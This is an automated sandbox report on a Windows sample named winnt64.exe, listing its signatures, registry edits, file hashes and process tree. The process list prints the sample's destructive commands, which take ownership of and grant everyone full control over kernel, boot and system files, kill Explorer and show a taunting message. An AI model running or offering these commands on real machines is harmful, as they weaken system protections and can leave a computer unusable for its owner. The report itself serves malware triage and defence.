Malware Analysis Report

2024-09-11 05:42

Sample ID 240701-cwm5datbqa
Target winnt64.exe
SHA256 dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88
Tags defense_evasion discovery exploit
Score 8/10


Analysis Overview


Threat Level: Likely malicious

The file winnt64.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery exploit

Possible privilege escalation attempt

Modifies file permissions

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Kills process with taskkill

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported 2024-07-01 02:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-07-01 02:25
Reported 2024-07-01 02:28
Platform win11-20240611-en
Max time kernel 136s
Max time network 99s

Command Line

"C:\Users\Admin\AppData\Local\Temp\winnt64.exe"

Signatures

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target

Drops file in Windows directory

Description Indicator Process Target

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\Taskmgr.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "3" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Windows\system32\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: 33 N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1920 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\winnt64.exe C:\Windows\system32\cmd.exe
PID 1920 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\winnt64.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 5000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2912 wrote to memory of 5000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2912 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 2912 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 3592 wrote to memory of 4808 N/A C:\Windows\system32\notepad.exe C:\Windows\System32\Taskmgr.exe
PID 3592 wrote to memory of 4808 N/A C:\Windows\system32\notepad.exe C:\Windows\System32\Taskmgr.exe
PID 4808 wrote to memory of 2968 N/A C:\Windows\System32\Taskmgr.exe C:\Windows\System32\Taskmgr.exe
PID 4808 wrote to memory of 2968 N/A C:\Windows\System32\Taskmgr.exe C:\Windows\System32\Taskmgr.exe
PID 2912 wrote to memory of 4976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2912 wrote to memory of 4976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2912 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\msg.exe
PID 2912 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\msg.exe
PID 2912 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\winnt64.exe

"C:\Users\Admin\AppData\Local\Temp\winnt64.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat C:\Users\Admin\AppData\Local\Temp\winnt64.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ntoskrnl.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\hal.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\hal.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ci.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ci.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\winload.efi"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\winload.efi" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\WindowsApps"

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\WindowsApps" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\SystemApps"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\SystemApps" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\ImmersiveControlPanel"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\ImmersiveControlPanel" /grant everyone:F

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\notepad.exe

notepad.exe

C:\Windows\System32\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe"

C:\Windows\System32\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe" /1

C:\Windows\system32\timeout.exe

timeout /t 30 /nobreak

C:\Windows\system32\msg.exe

msg * ITS TOO LATE TO REPAIR YOUR PC! I'VE PROBABLY HANGED YOUR PC HAHAHAHA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell wininit

C:\Windows\system32\wininit.exe

"C:\Windows\system32\wininit.exe"

Network

Country Destination Domain Proto
IE 52.111.236.22:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat

MD5 c7b7a1bdb6c0ed883395fb5c63fcf775
SHA1 2cb74dbd18ff3cb8d8df73abbb2e801964925348
SHA256 0d4be7c8c1ea9439dcd902e072da04a8b3cc0823c596749dbb8e23382973464c
SHA512 acc6bff3eca0c42f7fe410df3744a6d714ab2263aead18a1bed6e7a29772891bd190888b576e0044f7eebdff8a22903d821c486733792efd94e1d16d3380296d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 00b3ce0e658cf92f7ea6ed8e36f76966
SHA1 7109d316553b321577fe6090df84d7182aafa590
SHA256 76b1b9ebbd2b4b90dd4447c698ee7c76ef2a75399a0f33ccb79b1389f679378a
SHA512 eb7998a902bd25847219db3f1800efa94235ee2d62077468993160346255fcfa8acc1b2918aae01cf052c02b9e385b3ec3faf61a425d5924c6709586f87be893

memory/4808-7-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-6-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-5-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-12-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-17-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-16-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-15-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-14-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-13-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

memory/4808-11-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 4f55be8451c1090c2a54a50d79243cfb
SHA1 f1a94bc446b6ae32300ada858fb251667a17b71d
SHA256 1b8257869915ac04445cb4bfdc0e0fc03db80efb96da98c49e7cbc4097bc28a2
SHA512 b87403fc4ab05cd4dd092d0707cd0dd22f927c65dcf73bce6f6bf2731f0572e089697908eeb377617c9f2531fdb3a495087feafb31871ea9a6f472a45d9d20f6

C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 c27c1374edd5b819ac9f67c91d286373
SHA1 6768048f19f4dd2a3ab401e9f0b57570601f24a8
SHA256 a2d78e1e44733d24842f4e3a4fb86abd35219df6f6e90393c59abe99e1bb9ec0
SHA512 82bda0747e2e965f9e7a24ae494342af3f96043609eee38db74d18a3da0ddb0c2dabbb23c3f9223e5d0e89256b0b7a4ae0a0537966dd57a181a4505ad8a462c3

C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3tita52.edg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/112-36-0x0000014AB3AA0000-0x0000014AB3AC2000-memory.dmp